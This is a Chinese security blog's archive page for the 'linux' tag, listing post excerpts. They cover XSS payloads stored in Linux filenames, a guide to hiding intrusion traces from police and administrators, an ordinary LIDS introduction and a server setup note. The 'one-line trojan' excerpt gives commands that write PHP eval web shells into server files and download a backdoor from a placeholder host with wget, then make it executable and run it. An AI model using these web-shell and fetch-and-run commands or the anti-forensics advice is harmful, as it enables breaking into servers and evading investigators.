存档

文章标签 ‘linux’

linux filename xss

2010年11月15日 8 条评论

一、关于文件名
大家都知道在 windows 下面文件名是有规则,定义了一些保留的字符,他们分别是:

< (less than)
> (greater than)
: (colon)
" (double quote)
/ (forward slash)
\ (backslash)
| (vertical bar or pipe)
? (question mark)
* (asterisk)

而linux下面是没有对这些大部分字符进行限制的,可以随意定义的,那么,我们就可以将 XSS Pyload 存储在文件名中,如图所示:

我们可以看到可以成功将 xss pyload 存储在文件名当中了。
二、利用攻击 阅读全文…

分类: 网络安全 标签: , ,

linux入侵踪迹隐藏攻略

2008年4月19日 没有评论

作者:xi4oyu 来源:红狼
前言:
被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深,是我们必须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic,说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章,大部分就是下载个日志擦除的软件,然后运行下就可以了,对小站可以,但对方如果是经验丰富的管理员呢?我们该如何应对?我在这里只介绍unix-like system下的,至于windows或者其他什么系统下的,欢迎各位道友补充。
阅读全文…

分类: 网络安全 标签: , ,

LINUX下写入一句话木马的方法整理

2008年1月23日 没有评论

文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

LINUX下写入一句话木马的方法整理:
(1)echo  '<?eval($cmd);?>' > /home/web/www/PREFIX/htdocs/mu.php
(2)echo "<?fputs(fopen('1.php','w+'),'<?eval($_POST[c]);?>');?>" >test11.php
(3)"system('wget http://xxxxxx.com/backdoor -P /tmp')"
//wget的-P选项 指定保存的目录的,下载完你可以ls /tmp看下,一般有两个目录肯定可写的/tmp /usr/tmp推荐写/usr/tmp目录,下载好了,chmod +x backdoor 一下,然后执行一下,当然如果是c写的,需要事先编译一下。

分类: 网络安全 标签: ,

熟悉Linux内核安全入侵侦察系统

2008年1月17日 没有评论

来源:互联网实验室
       LIDS( Linux入侵侦察系统)是Linux内核补丁和系统管理员工lidsadm),它加强了Linux内核。它在内核中实现了一种安全模式 — 参考模式以及内核中的Mandatory Access Control(命令进入控制)模式。本文将阐述LIDS的功能和如何使用它来建立一个安全的Linux系统。
  为什么选择LIDS
  随着互连网上Linux越来越受欢迎 ,越来越多现有GNU/LINUX系统上的应用软件中的安全漏洞被发现。很多程序利用了程序员的粗心,例如缓存溢出、格式化代码攻击。当系统安全受到程序的危及,黑客获得ROOT权限以后,整个系统将被入侵者控制。
阅读全文…

分类: 网络安全 标签: ,

Linux服务器架设

2008年1月12日 1 条评论

今天用vmware架设了一个Linux服务器,像我这垃圾的机器能同时运行就不错了。。
安装步骤及软件下载: 阅读全文…

分类: 系统概念 标签: , ,